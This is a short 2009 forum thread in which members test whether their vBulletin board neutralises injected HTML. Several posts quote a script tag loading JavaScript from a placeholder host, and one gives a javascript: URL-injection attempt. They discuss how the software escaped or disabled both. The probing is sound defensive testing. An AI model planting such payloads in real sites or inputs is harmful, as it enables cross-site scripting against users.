TapcisForum  

Go Back   Tapcis Web Forums > Open Forums > Forum Use and Help

Reply
 
Thread Tools Display Modes
  #1  
Old September 19th, 2009, 10:32 AM
davidh davidh is offline
Member
 
Join Date: May 2005
Posts: 1,935
Default dummy hack test

<script src="http://_.com/_.js"></script>

If you do not see the above line of text , then there is a problem.

If the forum software had not converted the line containing the HTML tags, etc. into this:

&lt;script src=&quot;http://_.com/_.js&quot;&gt;&lt;/script&gt;

then it would have been possible to attempt to run a js script from anywhere on the web in your browser.

"dummy" means 1. it's not a real test and/or 2. the poster
__________________
DH
Reply With Quote
  View Parent  #2  
Old September 19th, 2009, 04:23 PM
sidney's Avatar
sidney sidney is offline
biocryptologist
 
Join Date: May 2005
Location: New Zealand
Posts: 1,091
Default

Quote:
Originally Posted by davidh View Post
<script src="http://_.com/_.js"></script>

If you do not see the above line of text , then there is a problem.
VBulletin has been around for a while and such security holes would have been closed a long time ago.

This site uses the option to disable all HTML in messages, using bbcode tags only. That's the simplest and safest option.

However, it does turn a URL string into HTML. Notice what it did in your message. If the proper security is in place it would not turn it into a URL that will execute Javascript. Hmm, I should check that but I have to run out the door in two minutes.
Reply With Quote
  View Parent  #3  
Old September 19th, 2009, 05:36 PM
davidh davidh is offline
Member
 
Join Date: May 2005
Posts: 1,935
Default

Quote:
Originally Posted by sidney View Post
VBulletin has been around for a while and such security holes would have been closed a long time ago.

This site uses the option to disable all HTML in messages, using bbcode tags only. That's the simplest and safest option.

However, it does turn a URL string into HTML. Notice what it did in your message. If the proper security is in place it would not turn it into a URL that will execute Javascript. Hmm, I should check that but I have to run out the door in two minutes.
I tried using the "Insert link" icon on the tool bar to paste the line of text in question, namely
<script src="http://_.com/_.js"></script>
as the contents of the URL and a click on "Preview Post" showed that the forum software had inserted zero, zilch, nada, thus blocking this kind of attack via the "Insert link" function.

As you say, I would have expected that such potential vulnerabilities have been closed long ago. I did not really expect to be able to show up any vulnerability in the first place. The main point of my OP was to show how little text is required to create an attack that could work without any clicking on any link by the user at all, if some vulnerabilities on both sides (server and browser) are unpatched.
__________________
DH
Reply With Quote
  View Parent  #4  
Old September 19th, 2009, 06:12 PM
sidney's Avatar
sidney sidney is offline
biocryptologist
 
Join Date: May 2005
Location: New Zealand
Posts: 1,091
Default

Quote:
Originally Posted by davidh View Post
The main point of my OP was to show how little text is required to create an attack that could work without any clicking on any link by the user at all, if some vulnerabilities on both sides (server and browser) are unpatched.
Yes, and it can be quite a challenge to allow users to enter some HTML without allowing any malicious HTML. Since HTML is disabled in posts here the job is quite a bit easier. The remaining tricky part is in the code that parses URL strings such as http://example.com to make sure that it can't be fooled by something like http://example.com"><href='javascript:alert("foo")'> (which I expect will show up with only the http://example.com part of it being a hot link -- ok, this is my test - [UPDATE:] I see that the code is even more clever -- It saw something is wrong and disables hot linking the entire attempt at a hack)
Reply With Quote
  View Parent  #5  
Old September 19th, 2009, 09:16 PM
davidh davidh is offline
Member
 
Join Date: May 2005
Posts: 1,935
Default

Quote:
Originally Posted by sidney View Post
it can be quite a challenge to allow users to enter some HTML without allowing any malicious HTML.
Sounds like about the same level of difficulty as having a girls plus boys slumber party with non-segregated bedrooms and NO hanky panky
__________________
DH
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT -5. The time now is 05:56 AM.


Powered by vBulletin® Version 3.7.4
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.